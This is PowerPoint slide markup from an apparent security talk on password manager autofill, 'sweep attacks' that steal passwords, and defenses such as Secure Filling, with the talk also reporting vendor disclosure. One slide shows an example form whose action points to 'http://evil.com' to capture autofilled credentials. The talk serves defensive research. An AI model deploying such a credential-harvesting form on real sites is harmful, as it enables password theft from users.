            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5760"/>
              <a:t>Defending against sweep attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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952500" y="871463"/>
            <a:ext cx="11099800" cy="1638119"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" defTabSz="484886">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="4980" b="1"/>
              <a:t>Defense #1: Manual Autofill</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4980"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr sz="4980"/>
            </a:br>
            <a:r>
              <a:rPr sz="4980"/>
              <a:t>as secure as manual entry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952500" y="7100185"/>
            <a:ext cx="7712770" cy="1676401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl2pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>Fill-and-Submit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>Still just one click for the user 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23</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="283" name="Screen Shot 2014-07-13 at 4.58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4601" y="3527821"/>
            <a:ext cx="30226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Screen Shot 2014-07-13 at 8.15.1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0177" y="3527821"/>
            <a:ext cx="2903332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87598" y="3731021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Page Load</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="294" name="Shape 294"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1657598" y="4366021"/>
            <a:ext cx="9625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5523508" y="4349452"/>
            <a:ext cx="850166" cy="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50800">
            <a:solidFill/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9041394" y="4357241"/>
            <a:ext cx="553208" cy="2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289" name="Screen Shot 2014-07-31 at 9.23.31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8868" y="2564420"/>
            <a:ext cx="2641674" cy="3603203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Shape 290"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952214" y="6470650"/>
            <a:ext cx="39761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Less convenient?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="291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089901" y="6865172"/>
            <a:ext cx="850349" cy="850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01201" y="6775754"/>
            <a:ext cx="850349" cy="850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1Password-4-Logo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578601" y="6865172"/>
            <a:ext cx="850349" cy="850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5" animBg="1" advAuto="0"/>
      <p:bldP spid="290" grpId="4" animBg="1" advAuto="0"/>
      <p:bldP spid="291" grpId="2" animBg="1" advAuto="0"/>
      <p:bldP spid="292" grpId="3" animBg="1" advAuto="0"/>
      <p:bldP spid="293" grpId="1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Chart 298"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2332967" y="3282189"/>
          <a:ext cx="9659666" cy="53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9" name="Shape 299"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="567266"/>
            <a:ext cx="10464800" cy="165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Can we do better?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="Shape 300"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="327661" y="5060950"/>
            <a:ext cx="19185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Security</a:t>
            </a:r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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6318148" y="92392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24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952500" y="871463"/>
            <a:ext cx="11099800" cy="1638119"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" defTabSz="484886">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="4980" b="1"/>
              <a:t>Defense #2: Secure Filling</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4980"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr sz="4980"/>
            </a:br>
            <a:r>
              <a:rPr sz="4980"/>
              <a:t>more secure than manual entry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952500" y="2871531"/>
            <a:ext cx="11099800" cy="488251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2400"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>Don’t let JavaScript read autofilled passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>Let form submit only if action matches action when password was saved</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>(Site must submit form using HTTPS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>Prototype implementation in Chromium (~50 lines)</a:t>
            </a:r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" name="Chart 307"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2332967" y="3282189"/>
          <a:ext cx="9659666" cy="5312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" name="Shape 308"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="327661" y="5060950"/>
            <a:ext cx="19185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Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309" name="Shape 309"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="567266"/>
            <a:ext cx="10464800" cy="165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5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5000"/>
              <a:t>More secure than manual entry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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6318148" y="9251950"/>
            <a:ext cx="368504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26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AJAX </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="Shape 3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10 sites out of Alexa Top 50* use AJAX to submit password forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>Workarounds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>Submit form in iFrame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>Create browser SendPwd API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27</a:t>
            </a:fld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9678754" y="8824383"/>
            <a:ext cx="28590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*as of October 2013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Disclosure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Disclosed results to password vendors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>Warning when autofilling HTTPS passwords on HTTP pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>Don't automatically autofill passwords in iFrames not same-origin with parent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28</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="321" name="ur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151" y="5063332"/>
            <a:ext cx="785364" cy="78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596" y="6453326"/>
            <a:ext cx="714474" cy="71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Conclusions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Automatic autofill has lots of corner cases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Sweep Attacks: steal passwords without any user interaction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="422275" lvl="0" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="3900"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3420"/>
              <a:t>Defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="844550" lvl="1" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="3900"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3420"/>
              <a:t>Require user interaction before filling passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="844550" lvl="1" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="3900"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3420"/>
              <a:t>Secure Filling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="844550" lvl="1" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="3900"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3420"/>
              <a:t>Just as convenient for user but much more secure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326" name="Shape 3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29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847666" y="4241800"/>
            <a:ext cx="2711005" cy="1270000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="0433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Password Manager Workflow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</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48" name="Screen Shot 2014-07-13 at 4.58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7703" y="6042421"/>
            <a:ext cx="3022601" cy="1676401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill/>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="Screen Shot 2014-07-13 at 4.59.04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610" y="6048771"/>
            <a:ext cx="2984501" cy="1663701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill/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4876800" y="2641687"/>
            <a:ext cx="2711004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Password Manager</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Shape 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3235139" y="3947207"/>
            <a:ext cx="1625009" cy="2101008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7608301" y="4044162"/>
            <a:ext cx="1551790" cy="1938374"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="508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934804" y="4586506"/>
            <a:ext cx="2711004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Save manually entered password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Shape 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8847666" y="4457699"/>
            <a:ext cx="271100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Autofill username and password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Shape 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9539224" y="3184128"/>
            <a:ext cx="266395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433FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Topic of this talk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2" animBg="1" advAuto="0"/>
      <p:bldP spid="55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Questions?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30</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33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3067050"/>
            <a:ext cx="5384800" cy="3619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HTTP Login Pages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31</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="334" name="Table 334"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1905376" y="2501966"/>
          <a:ext cx="9194046" cy="4749664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6346926"/>
                <a:gridCol w="1366723"/>
                <a:gridCol w="1480397"/>
              </a:tblGrid>
              <a:tr h="1008954">
                <a:tc gridSpan="3"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Alexa Top 500*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8954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Login Pages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408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—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850304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Load over HTTP, submit over HTTPS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71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17%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0726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Load and submit over HTTP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123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30%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40726">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="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600" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Load over HTTP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194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/>
                        <a:t>47%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35" name="Shape 335"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9763421" y="8824383"/>
            <a:ext cx="285902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*as of October 2013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What about strength checkers?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338" name="Shape 3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Only needed on registration forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>Use JavaScript to read password field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>Don’t conflict with secure filling - password managers shouldn’t be filling existing passwords on registration forms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339" name="Shape 3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32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Manual Autofill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4</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59" name="Screen Shot 2014-07-13 at 4.58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4601" y="3527821"/>
            <a:ext cx="3022601" cy="167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creen Shot 2014-07-13 at 8.15.11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0177" y="3527821"/>
            <a:ext cx="2903332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387598" y="3731021"/>
            <a:ext cx="1270001" cy="1270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Page Load</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Shape 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1657598" y="4366021"/>
            <a:ext cx="96258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cubicBezTo>
                  <a:pt x="7200" y="0"/>
                  <a:pt x="14400" y="0"/>
                  <a:pt x="21600" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="508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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5523508" y="4349452"/>
            <a:ext cx="850166" cy="6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4400" y="7200"/>
                  <a:pt x="7200" y="14400"/>
                  <a:pt x="0" y="21600"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="50800">
            <a:solidFill/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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9041394" y="4357241"/>
            <a:ext cx="553208" cy="2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50800">
            <a:solidFill/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953020" y="6146799"/>
            <a:ext cx="345337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User Interaction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66" name="Screen Shot 2014-07-31 at 9.23.31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8868" y="2564420"/>
            <a:ext cx="2641674" cy="3603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computer-mouse-clipart-black-and-whit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60505" y="6950075"/>
            <a:ext cx="601418" cy="106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Computer-Keyboard-Clip-Art-27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59287" y="6950075"/>
            <a:ext cx="1502536" cy="106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6" animBg="1" advAuto="0"/>
      <p:bldP spid="70" grpId="2" animBg="1" advAuto="0"/>
      <p:bldP spid="71" grpId="7" animBg="1" advAuto="0"/>
      <p:bldP spid="65" grpId="3" animBg="1" advAuto="0"/>
      <p:bldP spid="66" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="67" grpId="4" animBg="1" advAuto="0"/>
      <p:bldP spid="68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Automatic Autofill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5</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="75" name="Screen Shot 2014-07-13 at 4.58.1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32673" y="2689621"/>
            <a:ext cx="3022601" cy="16764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2025826" y="2892821"/>
            <a:ext cx="1270001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Page Load</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Shape 92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3295826" y="3527821"/>
            <a:ext cx="5536848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21600" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="14400" y="0"/>
                  <a:pt x="7200" y="0"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="50800">
            <a:solidFill/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568381" y="8161739"/>
            <a:ext cx="78734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Convenient…but hard to make secure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5109055" y="4037843"/>
            <a:ext cx="2792095" cy="1676401"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2792094" cy="1676400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="79" name="Shape 79"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="81246"/>
              <a:ext cx="2792095" cy="4312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/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2600"/>
                <a:t>User Interaction</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="80" name="computer-mouse-clipart-black-and-whit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74597" y="731668"/>
              <a:ext cx="367162" cy="651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Computer-Keyboard-Clip-Art-276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2126" y="731668"/>
              <a:ext cx="917286" cy="6512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2" name="Shape 82"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="557847" y="0"/>
              <a:ext cx="1676401" cy="1676400"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="114300" cap="flat">
              <a:solidFill>
                <a:srgbClr val="AA5D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 flipV="1">
              <a:off x="557847" y="0"/>
              <a:ext cx="1676401" cy="1676400"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="114300" cap="flat">
              <a:solidFill>
                <a:srgbClr val="AA5D16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pic>
        <p:nvPicPr>
          <p:cNvPr id="8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4830" y="6552477"/>
            <a:ext cx="774091" cy="7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3781" y="6552477"/>
            <a:ext cx="774091" cy="774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83964" y="6582136"/>
            <a:ext cx="714634" cy="714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aosp-icon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01283" y="6557881"/>
            <a:ext cx="763283" cy="76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706211" y="6582285"/>
            <a:ext cx="714475" cy="714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09718" y="6546841"/>
            <a:ext cx="785364" cy="78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956927" y="6582285"/>
            <a:ext cx="774092" cy="714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9" animBg="1" advAuto="0"/>
      <p:bldP spid="84" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="85" grpId="4" animBg="1" advAuto="0"/>
      <p:bldP spid="86" grpId="3" animBg="1" advAuto="0"/>
      <p:bldP spid="87" grpId="6" animBg="1" advAuto="0"/>
      <p:bldP spid="88" grpId="5" animBg="1" advAuto="0"/>
      <p:bldP spid="89" grpId="7" animBg="1" advAuto="0"/>
      <p:bldP spid="90" grpId="2" animBg="1" advAuto="0"/>
      <p:bldP spid="91" grpId="8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066800" y="3709156"/>
            <a:ext cx="11099800" cy="130507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6000" b="1"/>
              <a:t>Should we autofill?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188842" y="5429250"/>
            <a:ext cx="66271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Automatic Autofill Corner Cases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Should we autofill?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="461518">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="4740"/>
              <a:t>The contestants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7</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10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3288" y="3260785"/>
            <a:ext cx="1153060" cy="115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5854" y="3260785"/>
            <a:ext cx="1153060" cy="115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91654" y="3174018"/>
            <a:ext cx="1326592" cy="1326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74219" y="3174018"/>
            <a:ext cx="1326593" cy="1326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54196" y="2455568"/>
            <a:ext cx="35696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Browser-based:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="105" name="aosp-icon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33874" y="3151107"/>
            <a:ext cx="1372414" cy="1372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06852" y="6320143"/>
            <a:ext cx="1153060" cy="115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43552" y="6344152"/>
            <a:ext cx="1153060" cy="106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549530" y="6299750"/>
            <a:ext cx="1153060" cy="115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378192" y="6299750"/>
            <a:ext cx="1153059" cy="1153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url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962488" y="6320143"/>
            <a:ext cx="1153060" cy="115306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1605669" y="4571359"/>
            <a:ext cx="1866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Chrome 34</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Shape 112"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3937714" y="4571359"/>
            <a:ext cx="166934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Firefox 29</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="Shape 113"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6146544" y="4571359"/>
            <a:ext cx="161635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Safari 7.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Shape 114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8711316" y="4610100"/>
            <a:ext cx="924713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800"/>
              <a:t>IE 11</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Shape 115"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10584446" y="4495799"/>
            <a:ext cx="147127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Android</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>4.3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Shape 116"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="736920" y="5467367"/>
            <a:ext cx="2679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Third-party:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Shape 117"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3955469" y="7462378"/>
            <a:ext cx="165582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LastPass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>2.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Shape 118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9879292" y="7601896"/>
            <a:ext cx="288158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Norton</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>IdentitySafe 2014</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Shape 119"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1360076" y="7462378"/>
            <a:ext cx="196519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1Password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>4.5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Shape 120"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6097115" y="7462378"/>
            <a:ext cx="171521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KeePass </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>2.24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Shape 121"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8485903" y="7462378"/>
            <a:ext cx="13791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800"/>
              <a:t>Keeper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>7.5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Should we autofill?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="461518">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="4740"/>
              <a:t>Different form action</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Shape 124"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6305052" y="3077742"/>
            <a:ext cx="56141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&lt;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form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 action=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solidFill>
                  <a:srgbClr val="F33126"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>http://evil.com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”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&gt;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6381681" y="92392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8</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12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1051" y="5192259"/>
            <a:ext cx="774092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aosp-ic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5527" y="5197663"/>
            <a:ext cx="763282" cy="7632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" name="Group 130"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5240384" y="5186622"/>
            <a:ext cx="1134497" cy="979579"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1134496" cy="979577"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="128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85364" cy="785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Shape 129"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="360406" y="623977"/>
              <a:ext cx="77409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/>
              </a:lvl1pPr>
